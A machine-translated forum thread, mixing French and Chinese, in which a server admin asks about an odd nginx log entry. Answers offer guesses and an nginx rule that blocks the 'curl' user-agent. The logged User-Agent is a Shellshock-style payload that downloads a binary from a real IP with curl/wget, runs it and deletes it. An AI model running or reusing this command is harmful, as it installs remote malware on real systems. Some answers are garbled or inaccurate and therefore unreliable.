nginx - Questions sur l'utilisation de l'agent utilisateur pour attaquer
世界只因有你
世界只因有你 2017-05-16 17:10:16
0
3
681

Aujourd'hui, j'ai accidentellement découvert un journal très étrange dans le access.log de nginx sur le serveur de l'entreprise :

61.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"

Quand il s'agit d'endroits bizarres :

  1. Utilisation de http1.0

  2. user-agent est un script

J'ai cherché sur Internet et n'ai trouvé aucune information sur l'utilisation d'un agent utilisateur pour attaquer. Bien que j'aie pu obtenir le code du script en suivant l'adresse dans le journal, mes capacités étaient limitées et je n'ai pas pu analyser la cible de l'attaque.

Excusez-moi, des experts, avez-vous des informations et une expérience pertinentes ? Partagez-le avec moi, merci beaucoup ! !

Ajouté :

Sous quelle configuration de nginx analysera-t-il le contenu dans l'agent utilisateur ?

世界只因有你
世界只因有你

répondre à tous(3)
阿神

Il devrait s'agir de la vulnérabilité user-agent de http1.0. Votre serveur peut recevoir des scripts injectés par l'autre partie, et cela déguise un apachecode> sur vous. > service, transformant votre serveur en poulet et le manipulant pour effectuer des attaques DDOS, mais je ne sais pas si nginx exécutera son scripthttp1.0user-agent漏洞,你的服务器可能被对方注入脚本,他在你上面伪装了一个apache的服务,把你的服务器搞成了肉鸡,并操纵他进行DDOS攻击,但是我不知道nginx会不会执行它这个脚本

你可以看看你access.loghttp://37.1.202.6/mig这个地址。可以看到有个a文件http://37.1.202.6/a

Vous pouvez vérifier l'adresse http://37.1.202.6/mig dans votre access.log. Vous pouvez voir qu'il existe un fichier http://37.1.202.6/a Vous pouvez jeter un oeil à ce code. 🎜
滿天的星座

Scanner injecté. . . L'agent utilisateur sera analysé.
1. Installez le pare-feu d'application
2. Configurez Nginx

`
if ($http_user_agent ~* 'curl') #Configurez l'user_agent rejeté.
{
retour 403 ;
}
`

过去多啦不再A梦

Un paragraphe perl 脚本,作用就是 伪装成 Apache

Ensuite, acceptez les instructions pour faire quelque chose. . . C'est vrai, attraper des poulets de chair.

Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal